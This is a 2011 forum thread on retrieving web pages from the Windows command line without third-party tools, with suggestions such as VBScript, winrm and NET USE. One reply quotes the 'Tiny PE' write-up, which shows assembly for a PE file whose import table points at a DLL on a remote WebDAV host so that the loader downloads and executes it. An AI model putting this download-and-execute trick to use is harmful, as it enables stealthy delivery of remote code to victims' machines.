Posted 09 December 2011 - 06:02 PM
One can get HTTP pages using wget and many other third-party tools on Windows, however, how can one retrieve these HTML pages from the command line using nothing but the default Windows tools?
I am asking for ways that work on Windows 7 and if possible, on previous OS versions (telnet is not available any longer, was removed long since Vista by default).
Posted 09 December 2011 - 06:14 PM
Apart the non-solutions involving wget, I mean?
The.vbs doesn't seem a bad idea.
More on the same path:
I guess Italian is not a problem for you :
- Nuno Brito likes this
Posted 09 December 2011 - 07:29 PM
As for the vbs script, my taste would really fall onto an old fashioned tool that I could call directly from command line with no extra effort.
For example, I was reading more about winrm as it seems cut for this job but unfortunately it did not came to my avail: http://ss64.com/nt/winrm.html
Real pity as it comes by default on win7. More details: http://redmondmag.co...nrm--winrs.aspx
Posted 10 December 2011 - 05:51 PM
Posted 11 December 2011 - 08:54 PM
Otherwise, you're probably stuck with vbs or some other scripting language that you can use to harness the iexplorer dll's or something
Posted 12 December 2011 - 12:48 AM
Internet is not available necessarly, network connectivity is possible but on the case that I have in mind, the idea is to interact with a server running on localhost.
Even with Internet, most times only port 80 is available.
I will explain better.
Right now I'm working on a project called remedium. The UI is web based and the interaction of commands from the outside can be made from the command line using a browser or wget if we want to automate things from script.
For example, one app inside remedium can mount a registry hive using rawreg and then we can use web requests to add keys, read values, etc. One of the shortcomings of winbuilder was getting output from external apps or requests, and using web requests this is solved in a very elegant manner.
So, it would be nice to have a tool similar to wget on windows but I couldn't really find such tool, reason why I asked the community.
Thanks for all the answers.
Posted 12 December 2011 - 12:42 PM
--2011-12-12 23:39:07-- http://my.ipspace.com/
Resolving my.ipspace.com (my.ipspace.com)... 184.108.40.206
Connecting to my.ipspace.com (my.ipspace.com)|220.127.116.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16 [text/html]
Saving to: `index.html'
100%[==========================================================================================>] 16 --.-K/s in 0s
2011-12-12 23:39:07 (175 KB/s) - `index.html' saved [16/16]
Microsoft Windows [Version 6.1.7601]
But you want to make it out of stuff that already comes with windows? Or you want to know if there already is something like wget.... (there isn't).
You either have to get a copy of wget for windows, or (if you were doing some kind of automatic install that needed to get files) then you could use a short vbscript like this:
BTW, I believe telnet is still in Windows 7, it's just not installed by default anymore. Check under Add/Remove Features, TCP/IP or something...
Posted 12 December 2011 - 01:20 PM
Posted 12 December 2011 - 01:25 PM
I've looked closely for a solution to this and didn't found one, therefore asked the forum.
Posted 12 December 2011 - 01:54 PM
Smallest PE file that downloads a file from the Internet
The goal of the Tiny PE challenge was to write the smallest PE file that downloads a file from the Internet and executes it. The standard technique for this is to call URLDownloadToFileA and then WinExec to execute the file. There are many examples of shellcode that uses this API, but it requires us to load URLMON.DLL and call multiple functions, which would increase the size of our PE file significantly.
A less known feature of Windows XP is the WebDAV Mini-Redirector. It translates UNC paths used by all Windows applications to URLs and tries to access them over the WebDAV protocol. This means that we can pass a UNC path to WinExec and the redirector will attempt to download the specified file over WebDAV on port 80.
Even more interesting is the fact that you can specify a UNC path in the import section of the PE file. If we specify \\18.104.22.168\z as the name of the imported DLL, the Windows loader will try to download the DLL file from our web server.
This allows us to create a PE file that downloads and excutes a file from the Internet without executing a single line of code. All we have to do is put our payload in the DllMain function in the DLL, put the DLL on a publicly accessible WebDAV server and specify the UNC path to the file in the imports section of the PE file. When the loader processes the imports of the PE file, it will load the DLL from the WebDAV server and execute its DllMain function.
; The DLL name should be at most 16 bytes, including the null terminator
db "\\22.214.171.124\z", 0
times 16-($-dllname) db 0
The size of the PE file with a UNC import is still only 133 bytes.
WARNING: The PE file linked below is live. It will attempt to download and execute a payload DLL from http://126.96.36.199/z. The DLL will display a message box and exit, but you should take proper precautions and treat it as untrusted code.http://www.phreedom....ar/code/tinype/
- Nuno Brito likes this
Posted 12 December 2011 - 03:47 PM
Very nice find. Using your tip as starting point, I see that NET USE can be employed for this task.
I can type:
net use z: http://localhost:10101/logtrackerAnd this code triggers the web service as intended. It doesn't get me the result as a web page on my side but at least I have now a way to call web pages and trigger reactions and this is available from every version of Windows since XP.
It only bothers me that the same command is called twice by net send.
Posted 10 August 2012 - 07:29 AM
type 188.8.131.52:portsomething > result
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users